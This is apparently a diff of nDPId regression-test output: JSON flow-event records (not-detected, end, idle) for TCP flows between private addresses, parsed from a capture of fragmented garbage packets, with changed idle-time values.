-00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027433,"flow_last_seen":1534244027433,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":14387,"dst_port":14646,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027433,"flow_last_seen":1534244027433,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":14387,"dst_port":14646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029256,"flow_last_seen":1534244029256,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16199,"dst_port":21055,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029256,"flow_last_seen":1534244029256,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16199,"dst_port":21055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031384,"flow_last_seen":1534244031384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18762,"dst_port":18503,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031384,"flow_last_seen":1534244031384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18762,"dst_port":18503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027737,"flow_last_seen":1534244027737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18248,"dst_port":19019,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027737,"flow_last_seen":1534244027737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18248,"dst_port":19019,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028345,"flow_last_seen":1534244028345,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16243,"dst_port":21055,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028345,"flow_last_seen":1534244028345,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16243,"dst_port":21055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032907,"flow_last_seen":1534244032907,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":27502,"dst_port":30307,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032907,"flow_last_seen":1534244032907,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":27502,"dst_port":30307,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026217,"flow_last_seen":1534244026217,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24101,"dst_port":9251,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026217,"flow_last_seen":1534244026217,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24101,"dst_port":9251,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025305,"flow_last_seen":1534244025305,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9253,"dst_port":24102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025305,"flow_last_seen":1534244025305,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9253,"dst_port":24102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032298,"flow_last_seen":1534244032298,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9251,"dst_port":9770,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032298,"flow_last_seen":1534244032298,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9251,"dst_port":9770,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031993,"flow_last_seen":1534244031993,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":29799,"dst_port":26228,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031993,"flow_last_seen":1534244031993,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":29799,"dst_port":26228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025912,"flow_last_seen":1534244025912,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":21029,"dst_port":22878,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025912,"flow_last_seen":1534244025912,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":21029,"dst_port":22878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244033211,"flow_last_seen":1534244033211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10792,"dst_port":10790,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244033211,"flow_last_seen":1534244033211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10792,"dst_port":10790,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028953,"flow_last_seen":1534244028953,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":2612,"dst_port":12849,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028953,"flow_last_seen":1534244028953,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":2612,"dst_port":12849,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028041,"flow_last_seen":1534244028041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13105,"dst_port":14648,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028041,"flow_last_seen":1534244028041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13105,"dst_port":14648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030777,"flow_last_seen":1534244030777,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13362,"dst_port":12596,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030777,"flow_last_seen":1534244030777,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13362,"dst_port":12596,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029559,"flow_last_seen":1534244029559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":19273,"dst_port":19016,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029559,"flow_last_seen":1534244029559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":19273,"dst_port":19016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029864,"flow_last_seen":1534244029864,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9566,"dst_port":18498,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029864,"flow_last_seen":1534244029864,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9566,"dst_port":18498,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030168,"flow_last_seen":1534244030168,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":11892,"dst_port":26470,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030168,"flow_last_seen":1534244030168,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":11892,"dst_port":26470,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028649,"flow_last_seen":1534244028649,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17458,"dst_port":10790,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028649,"flow_last_seen":1534244028649,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17458,"dst_port":10790,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027129,"flow_last_seen":1534244027129,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13617,"dst_port":10536,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027129,"flow_last_seen":1534244027129,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13617,"dst_port":10536,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031080,"flow_last_seen":1534244031080,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18258,"dst_port":16199,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031080,"flow_last_seen":1534244031080,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18258,"dst_port":16199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025609,"flow_last_seen":1534244025609,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16417,"dst_port":16419,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025609,"flow_last_seen":1534244025609,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16417,"dst_port":16419,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026825,"flow_last_seen":1534244026825,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8995,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
